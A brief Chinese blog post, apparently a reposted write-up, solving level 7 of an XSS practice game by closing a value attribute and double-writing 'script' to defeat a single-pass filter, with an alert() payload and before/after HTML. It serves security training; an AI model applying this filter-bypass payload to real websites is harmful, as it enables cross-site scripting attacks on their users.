XSS-Game level 7

本文阅读 1 分钟
首页 安全分享,WEB安全 正文

第七关过滤了 script , 但未过滤尖括号 '<','>' , 使用双写绕过

img

 

源码中过滤了大小写 , script , 以及一些属性 , 并将参数拼接到 value 值

img

img

使用 htmlspecialchars() 过滤标签 , 但未重新赋值给 $str , 所以不会产生影响

img

此关卡为过滤尖括号 , 并且只过滤了一遍 script , 我们使用双写绕过 payload

"><scscriptript>alert(7)</scscriptript>

左侧双引号用来闭合 value属性的左双引号 , 左侧尖括号 > 用来闭合input标签

<input name=keyword  value="'.$str6.'">    //拼接前
<input name=keyword  value=""> <scscriptript>alert(7)</scscriptript>"> //拼接后
<input name=keyword  value=""> <script>alert(7)</script>">    //过滤后

过关

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118560138
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复